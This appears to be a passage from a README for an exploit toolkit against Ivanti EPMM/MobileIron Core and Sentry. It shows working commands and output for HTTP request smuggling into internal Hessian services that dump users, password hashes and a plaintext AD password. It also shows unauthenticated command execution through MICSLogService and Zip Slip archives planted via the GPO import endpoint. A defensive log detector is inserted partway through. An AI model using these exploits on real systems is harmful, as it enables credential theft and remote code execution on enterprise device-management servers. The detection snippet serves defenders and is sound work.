More details in:
- Ivanti EPMM / MobileIron Core - Multiple Vulnerabilities
- Ivanti Sentry / MobileIron Sentry - Unauthenticated Remote Code Execution
- Multiple interesting methods on the Hessian service can be called:

```text
Usage: mi_desync.py [OPTIONS] COMMAND [ARGS]...

╭─ Options ──────────────────────────────────────────────────────────────────────────────╮
│ --help                  Show this message and exit.                                    │
╰────────────────────────────────────────────────────────────────────────────────────────╯
╭─ General options ──────────────────────────────────────────────────────────────────────╮
│ * -t TEXT               The target URL [default: None] [required]                      │
│   -x TEXT               HTTP proxy [default: (None)]                                   │
│   -A TEXT               User-Agent [default: Mozilla/5.0]                              │
╰────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ─────────────────────────────────────────────────────────────────────────────╮
│ findLdapUsers                                                                          │
│ getAllUsers             Dump Users                                                     │
│ getLDAPConfigs          Dump the LDAP configuration                                    │
│ getSettings             Get multiple settings by ID (e.g. 28,409)                      │
│ getSettingsByProperty   e.g. saveUserPassword,enterpriseName                           │
│ retrieveUserPassword    Retrieve plaintext password of a user                          │
│ setSaveUserPassword     Multiple settings by property (e.g. saveUserPassword,feature.flag.secret) │
│ storeUserPassword       Change password of a user                                      │
╰────────────────────────────────────────────────────────────────────────────────────────╯
```
- Dump all users

```console
$ mi_desync.py -t https://micore.local getAllUsers | jq '.[] | {principal, email, passcode}'
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService...
[+] Got Hessian reply with object of type UserServiceResultDTO
{
  "id": 9000,
  "principal": "misystem",
  "email": null,
  "passcode": null,
  "userSource": "L"
}
{
  "id": 9001,
  "principal": "admin",
  "email": null,
  "passcode": "V2;KyC4Z/jQI4zL0InyCtWZ2g==;F24/vblg/tAaIpwtbY5+PQ==",
  "userSource": "L"
}
[...]
```
- Enable the `saveUserPassword` setting

```console
$ mi_desync.py -t https://micore.local setSaveUserPassword 1
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/SettingsService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type MISettingsResultDTO
[]
$ mi_desync.py -t https://micore.local getSettingsByProperty saveUserPassword
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/SettingsService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type tuple
[
  [
    {
      "miSettingId": 28,
      "property": "saveUserPassword",
      "value": "1",
      "uuid": null,
      "id": null,
      "principal": null,
      "deviceSpaceId": 1,
      "deviceSpacePath": "/1/",
      "modifiedAt": "11/01/2023, 01:01:01"
    }
  ]
]
```
- Retrieve a user's password

```console
$ mi_desync.py -t https://micore.local retrieveUserPassword ayrton
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type str
["SuperSecureADPassword123"]
```
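The `[*] Calling` lines above show what the desync request looks like on the wire: a `/ca/` path carrying URL-encoded line breaks (`%0a`), a forged `Host: 127.0.0.1` header and a second request line aimed at `/mifs/services/...`. The following detection snippet is an added example, not part of this repository or of Ivanti's product; it assumes a combined-format access log (constructed sample lines are embedded), decodes each request path and flags any that decodes to an embedded request or header block.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Aug/2023:10:16:01 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Aug/2023:10:16:02 +0000] "GET /ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Aug/2023:10:16:03 +0000] "GET /ca/search?q=100%25%20done HTTP/1.1" 200 88 "-" "curl/8.0"
'''.strip()

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d+)')

# Tokens that belong in a request line or header block, never inside a decoded URL path.
EMBEDDED_REQUEST_RE = re.compile(
    r'(\r?\n)\s*(Host:|X-Forwarded-For:|(?:GET|POST|PUT|DELETE)\s+/\S*\s+HTTP/1\.[01])',
    re.IGNORECASE)

def find_smuggled_requests(log_text):
    """Return one dict per log line whose decoded path embeds a second HTTP request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(m.group('path'))  # %0a -> '\n', %20 -> ' ', %3f -> '?'
        if '\n' not in decoded and '\r' not in decoded:
            continue  # ordinary encoded query strings never decode to line breaks
        if not EMBEDDED_REQUEST_RE.search(decoded):
            continue
        # The inner request line tells the responder which back-end service was reached.
        inner = re.search(r'(?:GET|POST|PUT|DELETE)\s+(/\S*)\s+HTTP/1\.[01]', decoded, re.IGNORECASE)
        hits.append({
            'src': m.group('src'),
            'time': m.group('ts'),
            'outer_path': m.group('path').split('%', 1)[0],
            'inner_path': inner.group(1) if inner else None,
            'status': int(m.group('status')),
        })
    return hits

if __name__ == '__main__':
    for hit in find_smuggled_requests(SAMPLE_LOG):
        print(f"[!] {hit['src']} smuggled {hit['inner_path']} via {hit['outer_path']} at {hit['time']}")
```

Adjust `LOG_RE` to the field order of the log source you ingest; the decode-then-scan logic is what matters, since the encoded path passes naive string matches on `Host:` or `HTTP/1.1`.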
- Call the `uploadFileUsingFileInput` method in `MICSLogService` to execute commands

```console
$ curl -sk -H 'Content-Type: application/x-hessian' 'https://sentry1.local:8443/mics/services/MICSLogService' -v --data-binary @<(echo $(./mi_sentry_micslogservice.py "<CMD_LINE>") | base64 -d) 2>&1 " --output -
HRH isRunningTZ
```
- Use `genZip.java` to craft Zip Slip archives

```console
$ mkdir zipit
$ echo 1 > zipit/test.txt
$ javac genZip.java && java genZip
$ base64 -d genZip.out > payload.zip
$ unzip -l payload.zip
Archive:  payload.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        1  2023-08-01 10:16   ../../../../mi/tomcat/webapps/mifs/text.txt
```
- Exploit the GPO import feature

```console
$ curl -k https://micore.local/mifs/rest/api/v2/component/gpo/import -u 'admin:***' -H 'Referer: http://micore.local/' -F admxZipPackage=@zipslip/mi_zip/payload.zip
{"errors":null,"result":"Admx package successfully ingested","success":true}
```